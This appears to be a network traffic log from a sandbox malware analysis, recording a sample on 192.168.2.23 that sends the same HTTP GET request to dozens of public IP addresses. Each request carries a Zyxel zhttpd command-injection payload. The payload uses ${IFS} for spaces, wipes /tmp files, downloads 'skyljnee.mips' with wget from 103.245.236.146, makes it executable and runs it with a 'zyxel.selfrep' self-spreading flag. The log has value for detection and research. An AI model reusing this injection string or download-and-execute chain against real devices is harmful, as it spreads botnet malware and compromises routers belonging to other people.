                                                Jan 28, 2024 10:16:44.098511934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9227192.168.2.2359176136.149.68.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098540068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9228192.168.2.235634287.121.38.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098548889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9229192.168.2.2350102116.41.7.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098565102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9230192.168.2.234155623.38.108.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098573923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9231192.168.2.234689658.211.65.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098576069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9232192.168.2.234039617.173.35.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098639965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9233192.168.2.2358908218.70.111.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098661900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9234192.168.2.234310036.254.27.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098711967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9235192.168.2.2336878114.199.200.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098731041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9236192.168.2.2341664135.228.70.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098776102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9237192.168.2.2350882122.188.117.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098815918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9238192.168.2.235065846.239.63.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098839998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9239192.168.2.2357238175.1.144.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098867893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9240192.168.2.233613461.206.187.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098901033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9241192.168.2.2354492171.125.153.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098928928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9242192.168.2.2353562208.47.146.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098936081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9243192.168.2.2350326194.219.12.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098963976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9244192.168.2.2352640126.140.223.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.098997116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9245192.168.2.234518877.172.92.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099016905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9246192.168.2.2335078101.228.149.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099045038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9247192.168.2.235239854.79.227.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099066973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9248192.168.2.234883877.168.4.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099091053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9249192.168.2.2334822176.0.18.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099097013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9250192.168.2.2345354179.201.117.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099140882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9251192.168.2.2349428124.235.193.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099167109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9252192.168.2.2350678183.177.15.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099200964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9253192.168.2.235807624.202.225.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099235058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9254192.168.2.2336766137.72.204.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099280119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9255192.168.2.2345370163.212.56.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099329948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9256192.168.2.233794246.127.165.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099350929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9257192.168.2.2353964221.118.44.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099373102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9258192.168.2.2354370190.1.28.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099404097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9259192.168.2.234797287.143.28.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099426031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9260192.168.2.234579048.146.129.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099436998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9261192.168.2.234082239.81.80.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099478006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9262192.168.2.2351002163.185.157.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099510908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9263192.168.2.2337482110.123.6.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099535942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9264192.168.2.2335876145.15.178.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099553108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9265192.168.2.2354834143.185.194.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099562883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9266192.168.2.235600252.209.169.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099586964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9267192.168.2.234729869.223.103.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099621058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9268192.168.2.2357524123.122.92.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099651098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9269192.168.2.234249673.31.107.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099685907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9270192.168.2.2357712200.174.220.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099700928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9271192.168.2.2359742198.53.177.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099724054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9272192.168.2.235002669.46.101.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099761963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9273192.168.2.2358460132.84.1.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099800110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9274192.168.2.233546848.154.1.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099824905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9275192.168.2.2337016103.252.18.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099833965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9276192.168.2.2352666148.71.112.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099837065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9277192.168.2.235240098.147.50.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099862099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9278192.168.2.2356156188.52.150.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099898100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9279192.168.2.2343340124.237.75.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099936962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9280192.168.2.2347908115.34.94.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099971056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9281192.168.2.2342360143.1.135.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.099999905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9282192.168.2.2333974161.121.217.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100023031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9283192.168.2.2354172117.137.118.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100066900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9284192.168.2.2346120202.6.172.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100091934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9285192.168.2.2343284166.119.226.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100110054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9286192.168.2.236048825.225.195.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100128889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9287192.168.2.2354590144.88.20.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100152969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9288192.168.2.235933623.245.149.60443
                                                TimestampBytes transferredDirectionData
